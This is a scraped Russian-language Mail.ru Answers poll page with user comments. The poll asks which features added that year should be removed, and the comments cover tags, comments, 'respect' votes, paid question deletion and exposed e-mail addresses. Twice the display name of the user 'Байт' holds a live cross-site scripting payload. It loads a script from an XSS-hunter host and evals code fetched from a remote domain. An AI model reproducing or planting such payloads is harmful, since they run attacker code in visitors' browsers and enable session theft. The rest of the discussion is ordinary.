Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиКалендарьОблакоЗаметкиВсе проекты

Что из появившегося на проекте за год стоит убрать?

Байт Эксперт пока не указал должность 16 лет назад
Проголосовало 475 чел
Варианты ответов
39
58
34
83
22
25
75
24
10
30
130
35
234
64
Комментарии
Байт"><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) 16 лет назад
А кто против меток и камментов, тем их отключим :)
Уууууууу, я была против меток), но за каменты. Ура каменты рулят!
Семён БелихинПрофи (780) 16 лет назад
Хачу .GIF ы!!!!
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) Вопрос задан «что из перечисленного вы не хотите», а не «что вы хотите»
PunisheRПросветленный (25589) 16 лет назад
кажется последнего варианта вначале здесь не было..?
косильшик от армии...Просветленный (20446) 16 лет назад
интервью... туда вопросы непонятно какие попадают, я как-то жириновскому задавал парочку согласно его обещаниям и они не прошли, хотя я за него однажды в президенты голосовал... и интересно было на прямую спросить у него лично, как он на свои обещания невыполненные ответил бы... с тех пор в моих глазах интерьвью себя дискредитировало.
Открытое голосование за интересность... даёт повод для всяких нездоровых действий, по отношению к минусёрам.
Золотой фонд... бессмысленнен, на мой взгляд, есть же поиск...
Открытая модерация... см. Открытое голосование за интересность...
Уважение/поддержка... если я уважаю много людей? и так с 2х акков приходится, а больше заводить не хочу, бо пароли и ники забываю.
Удаление вопросов за sms... через чур барыжно.
КаринаОракул (70449) 16 лет назад
Если невозможно сделать,чтобы "уважение" можно было выразить,хотя бы троим( пятерым),то лучше его ,вообще убрать....
andrej kutalevПросветленный (22940) 16 лет назад
Надо на мой взгляд удалить тех участников кто не имеет свой мир.Не всех.Один мой друг пользуется мобильным.
А основная масса это двойные,тройные ящики.Ими пользуются чтобы пакостить и писать гадости.
У многих сайтов стоит что с одног адреса нельзя иметь больше одного аккаунта и это правильно.
Я к примеру захожу в свободное время и вместо того чтобы с друзьями общаться,отвечать или задавать вопросы.Пишу ответы всякой мрази и я не один такой.Много жалоб на модераторов и даже характеристики персональные от тех кто достучался.
Я начинаю думать пара модераторов идут на поводу друзей.Удаляют,банят,наказывают.Меня банили по жалобам.Этих жалобщиков было(есть)8 ни один не имеет своего мира.В одном двух вопросах я получил ответ в виде личного оскорбления.Забанили меня не их.
У меня ник,аватар,но в моём мире я имею и в фото и настоящие имя и фамилию.Мне нечего скрывать.Думаю у Вас появятся дополнительные вопросы к моему письму пишите я Вам отвечу.
Руслан ТряховГений (50319) 16 лет назад
А почему у меня не получается писать коментарии в других опросах?
косильшик от армии... Просветленный (20446) потому что это спец опрос... ещё римляне сказали: quod lieel jovi, non licet bovi.
VISOМыслитель (8646) 16 лет назад
К примеру, я задал очень личный вопрос. Спросил как лечить венерическое заболевание. Естесственно под псевдонимом, не указывая ФИО, чтобы никто не узнал меня. А оказалось, что мой e-mail в свободном доступе, и любой мой работодатель, может узнать мою тайну, прочитав мой е-mail, указанный на моей визитке, просто набрав адресной строке браузера ))) У меня есть возможность удалить компромат, но только уже за 1$, вместо того чтобы просто закрыть доступ к моей личной информации. Т.е. я выкупаю свой секрет, который без моего согласия открыт под моим РЕАЛЬНЫМ именем, а не псевдонимом. Можно, конечно зарегить еще один ящик, для проекта "Ответы", но я привык к своему, указанному в моей визитке. Ведь существует "Мой мир" и пусть принятые мною друзья, а не теща копаются в моих вопросах и ответах.
ПрелестьМудрец (12424) 16 лет назад
Опросы замучили
СлаваПросветленный (49995) 16 лет назад
Добрый день, Максим!!!
Скажите, пожалуйста, а когда в наши опросы можно будет вставлять комментарии?
И еще... ну проголосовали люди за то, что нужно убрать "Удаление вопросов за sms", и что теперь это уберут? Или зачем Вы это спрашивали тогда?
Не уберут :) Но ваше мнение принято к сведению.
JaxГений (95644) 16 лет назад
Ура, наконец-то сделали каменты к опросам :)
По сабжу - "уважение" весьма сомнительная вещь. Остальное, если и не нужно, то по крайне не напрягает (кроме фиговых меток, но их можно быстро промотать).
PunisheR Просветленный (25589) ага. каменты - это конечно круто, но неудаляемые каменты круче вдвойне
fПросветленный (23555) 16 лет назад
1. Результаты опросов не должны быть видны голосующему перед голосованием!!!
2. Удаление штатниками наших творений- безаппеляционно... пиши или не пиши- результат один: нет восстановлений... Чёрная дыра! Отсюда вывод: Открытая модерация- блеф, подставили несчастных внештатников под негатив и всё! Только они и фильтруют свои действия!
Пользователь удаленМыслитель (8789) 7 лет назад
А на кой вопрос задавать? Как будто вы что-то поменяли. 222 человека проголосовали за удаление вопроса по SMS - и что, убрали?